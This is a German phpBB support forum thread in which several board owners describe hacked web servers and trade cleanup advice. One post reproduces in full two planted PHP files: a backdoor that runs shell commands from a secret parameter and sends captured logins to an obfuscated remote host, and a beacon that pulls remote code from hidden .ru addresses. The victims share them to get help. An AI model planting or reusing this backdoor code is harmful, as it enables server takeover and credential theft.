Die Einträge, die Dir Deine Programme liefern, sind Spy- und Malware auf Deinem Rechner, nicht auf dem Server.
Dort ist die Frage, was genau gemacht wurde.
Hier sollte auch mal ein Blick in die Logs des Webservers geworfen werden.
Provider, die solche Aussagen treffen, sollten gebannt und nach /dev/null geschickt werden.
Da empfehle ich ernsthaft einen Providerwechsel!
Brauche dringend HILFEEEE!!
Forumsregeln
Auch wenn hier der Support für phpBB 2 weiterhin aufrecht erhalten bleibt, weisen wir darauf hin, dass das phpBB 2 nicht mehr offiziell unterstützt und weiterentwickelt wird!
Auch wenn hier der Support für phpBB 2 weiterhin aufrecht erhalten bleibt, weisen wir darauf hin, dass das phpBB 2 nicht mehr offiziell unterstützt und weiterentwickelt wird!
-
oxpus
- Administrator
- Beiträge: 28737
- Registriert: Mo 27.Jan, 2003 22:13
- Wohnort: Bad Wildungen
- Kontaktdaten:
all-inkl.com?
Dann ist die kompetent und Du hast wirklich ein Problem mit Deiner Umgebung!
Du solltest dann auch Joomla schnellstens aktualisieren und auf den Supportforen zum System nach Patches fahnden.
Von Joomla hab ich auch so einige Lücken mitbekommen...
Dann ist die kompetent und Du hast wirklich ein Problem mit Deiner Umgebung!
Du solltest dann auch Joomla schnellstens aktualisieren und auf den Supportforen zum System nach Patches fahnden.
Von Joomla hab ich auch so einige Lücken mitbekommen...
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
-
Indextrader
- Beiträge: 372
- Registriert: Sa 17.Sep, 2005 11:50
Hi Snoopy
Ich hatte vor Wochen auf meinem lokalen Rechner einen Trojaner, der dauernd selbstständig Spyware installiert hat, der Rechner war kaum noch zu gebrauchen, der Trojaner mit keiner der mir bekannten Virensoftware zu entfernen, teils wurde er nicht einmal erkannt.
Bin dann durch Zufall auf AVG gestossen, meine grosse Rettung.
http://www.grisoft.com/doc/5/lng/de/tpl/tpl01
Diese Software hat gnadenlos alles schädliche in der Testversion entfernt und der Rechner ist wieder völlig sauber, ich war schon kurz davor, den gesamten Rechner platt zu machen und neu aufzusetzen.
Hilft dir natürlich nicht bei deinem Serverproblem, aber eventuell, wenn dein lokaler Rechner das Grundübel ist.
Du kannst die Software 30 Tage lang testen, mit der Testversion habe ich meinen Rechner wieder komplett in Ordnung bekommen und danach die Software sofort gekauft
Vielleicht hilft es dir ja
Liebe Grüße und ganz ganz viel Glück, das du dein Board schnell wieder hinbekommst
Uwe......*schwermitfühl*
Ich hatte vor Wochen auf meinem lokalen Rechner einen Trojaner, der dauernd selbstständig Spyware installiert hat, der Rechner war kaum noch zu gebrauchen, der Trojaner mit keiner der mir bekannten Virensoftware zu entfernen, teils wurde er nicht einmal erkannt.
Bin dann durch Zufall auf AVG gestossen, meine grosse Rettung.
http://www.grisoft.com/doc/5/lng/de/tpl/tpl01
Diese Software hat gnadenlos alles schädliche in der Testversion entfernt und der Rechner ist wieder völlig sauber, ich war schon kurz davor, den gesamten Rechner platt zu machen und neu aufzusetzen.
Hilft dir natürlich nicht bei deinem Serverproblem, aber eventuell, wenn dein lokaler Rechner das Grundübel ist.
Du kannst die Software 30 Tage lang testen, mit der Testversion habe ich meinen Rechner wieder komplett in Ordnung bekommen und danach die Software sofort gekauft
Vielleicht hilft es dir ja
Liebe Grüße und ganz ganz viel Glück, das du dein Board schnell wieder hinbekommst
Uwe......*schwermitfühl*
habe das gleiche problem ... ebenfalls dimension
in jedem ordner wurde ein htaccess angelegt sowie 2 datein mit folgenden inhalt
man sollte solche menschen 25 jahre einsperren, die wissen garnicht was sie weltweit für schäden anrichten ...
oxpus heute scheint es sehr sehr viele erwischt zu haben, auch bei volkers board sind einige mit dem selben problem ...
bei mir sind alle ordner auf diesen server betroffen inkl. aller domains die dort von mir liegen ...
gruss
in jedem ordner wurde ein htaccess angelegt sowie 2 datein mit folgenden inhalt
Code: Alles auswählen
<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."
&p=". base64_encode(md5($_POST["p"]));}
else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") .
sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"
] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>[/code
und in der anderen datei das
[code]<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] :
$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] :
$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] :
$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] :
$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] :
$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] :
$REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".
base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f)."."
.base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").
base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str)))
{} else {include(base64_decode("aHR0cDovLw==").base64_decode
("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>oxpus heute scheint es sehr sehr viele erwischt zu haben, auch bei volkers board sind einige mit dem selben problem ...
bei mir sind alle ordner auf diesen server betroffen inkl. aller domains die dort von mir liegen ...
gruss
-
Christian_N
- Beiträge: 1787
- Registriert: Sa 19.Feb, 2005 21:48
- Wohnort: Frankfurt am Main
- Kontaktdaten:
Nanana, wie es ausschaut, da Volker auch dimension benutzt wie ich weiss, das wohl oder übel eine lücke in dimension entdeckt wurde, den wie ich bisher mit bekommen sind alle betroffenen dimension boards.
Meine Projekte: Chantals - Fanpage .::. phpBB Projekt
-
Christian_N
- Beiträge: 1787
- Registriert: Sa 19.Feb, 2005 21:48
- Wohnort: Frankfurt am Main
- Kontaktdaten:
Das problem was ich sehe hierbei nur ist, wenn es eine lücke in dimension ist, das dann backup aufspülen nicht viel bringen, da dann tut man alle Passwörter ändern spült backup auf die Seite steht wieder aber nach paar stunde oder so ist dasselbe problem wieder, da die lücke noch gibt.
Man müsste also wirklich erst die Lücke kennen die der cracker ausnutzt und die muss gestopft werden dann erstmal.
Die frage lautet nur, wie man die am beste jetzt rausfinden kann...
Man müsste also wirklich erst die Lücke kennen die der cracker ausnutzt und die muss gestopft werden dann erstmal.
Die frage lautet nur, wie man die am beste jetzt rausfinden kann...
Meine Projekte: Chantals - Fanpage .::. phpBB Projekt
hallöchen
da es auch mich erwischt hatt/e - weiß nicht ob ich den/die endlich ausgesperrt habe. möcht ich
noch schreiben, falls es welche gibt die auf ihren server mehrere sachen außer die dim liegen haben, sollten alle datein geprüft werden.
bei mir war das forum verseucht - mein mysqldumper ornder - mein e-card ordner - und meine bildergallerie.
in allen ordnern mußten teilweise ordner rechte 777 bekommen - und genau da hat der sich mit
einer htaccess und zwei php datein eingenistet.
mysqldumper - ecard und bildergallerie hab ich sofort vom server gelöscht - mein forum bereinigt
nun hoffe ich das ich die türchen zugemacht habe. mal schaun - ich kontrollier jetzt mal öffters
im ftp ob jemand was geändert hat sieht man am datum u. uhrzeit - mal gucken ob der wieder kommt.
mein hoster hat seine ip schon geblockt und bemerkt das der server aus kasatan oder so angegriffen wurde. leider kann er nur mit der ip nichts anfangen meint er. schade
ich find auch die gehören weggesperrt - grrrrr nun muß ich wenn sich alles gelegt hat und wieder sicher ist, meine gelöschten sachen wieder installieren. aber das ist egal wenn nur mein forum gesund bleibt - da steckt so viel arbeit drin.
nun wünsch ich allen betroffenen glück alles wieder hinzubekommen
und allen nicht betroffenen glück das nichts passiert
sausebaby
da es auch mich erwischt hatt/e - weiß nicht ob ich den/die endlich ausgesperrt habe. möcht ich
noch schreiben, falls es welche gibt die auf ihren server mehrere sachen außer die dim liegen haben, sollten alle datein geprüft werden.
bei mir war das forum verseucht - mein mysqldumper ornder - mein e-card ordner - und meine bildergallerie.
in allen ordnern mußten teilweise ordner rechte 777 bekommen - und genau da hat der sich mit
einer htaccess und zwei php datein eingenistet.
mysqldumper - ecard und bildergallerie hab ich sofort vom server gelöscht - mein forum bereinigt
nun hoffe ich das ich die türchen zugemacht habe. mal schaun - ich kontrollier jetzt mal öffters
im ftp ob jemand was geändert hat sieht man am datum u. uhrzeit - mal gucken ob der wieder kommt.
mein hoster hat seine ip schon geblockt und bemerkt das der server aus kasatan oder so angegriffen wurde. leider kann er nur mit der ip nichts anfangen meint er. schade
ich find auch die gehören weggesperrt - grrrrr nun muß ich wenn sich alles gelegt hat und wieder sicher ist, meine gelöschten sachen wieder installieren. aber das ist egal wenn nur mein forum gesund bleibt - da steckt so viel arbeit drin.
nun wünsch ich allen betroffenen glück alles wieder hinzubekommen
und allen nicht betroffenen glück das nichts passiert
sausebaby
das hatte ich gestern in mein forum auch - die activity.php ging einfach nimmer auf.
nur weisse seite
bis wir endlich die datein überspielen konnten die der geändert hat. waren in includes ornder
irgendwelche datein.
wenn das das gleich sein sollte - wir haben 2 stunden gesessen und alle datein angeschaut,
geänderte hochgeladen usw... haben die weisse seite aber wegbekommen.
da hab ich ein super hoster der hat sich echt zeit für genommen.
nur weisse seite
bis wir endlich die datein überspielen konnten die der geändert hat. waren in includes ornder
irgendwelche datein.
wenn das das gleich sein sollte - wir haben 2 stunden gesessen und alle datein angeschaut,
geänderte hochgeladen usw... haben die weisse seite aber wegbekommen.
da hab ich ein super hoster der hat sich echt zeit für genommen.
Ja...grade drum sind mir ja die PN´s oder User-Notizen eingefallen...was höflichst überlesen wurdeMan müsste also wirklich erst die Lücke kennen die der cracker ausnutzt und die muss gestopft werden dann erstmal.
Die frage lautet nur, wie man die am beste jetzt rausfinden kann...
irgendwo muss da ja einer die daten hergehabt haben...in der config.php die meistens auch davon betroffen war..gibts ja nur die daten der datenbank...nur so wie snoopy das schildert..neue domain angelegt usw...ich mein...bzw.. ich hab z.b. für ftp andere zugangsdaten wie für die datenbank...weiss nicht in wie weit sowas über die datenbank möglich wäre...Das mit den 777 rechte ordner stimmt da wurden bei einigen bilder gelöscht oder dateien eingepflanzt...aber wie kommt man über diese Ordner an Zugangsdaten???
*Und wenn ihr mich sucht, ich halte mich in der n?he des Wahnsinns auf*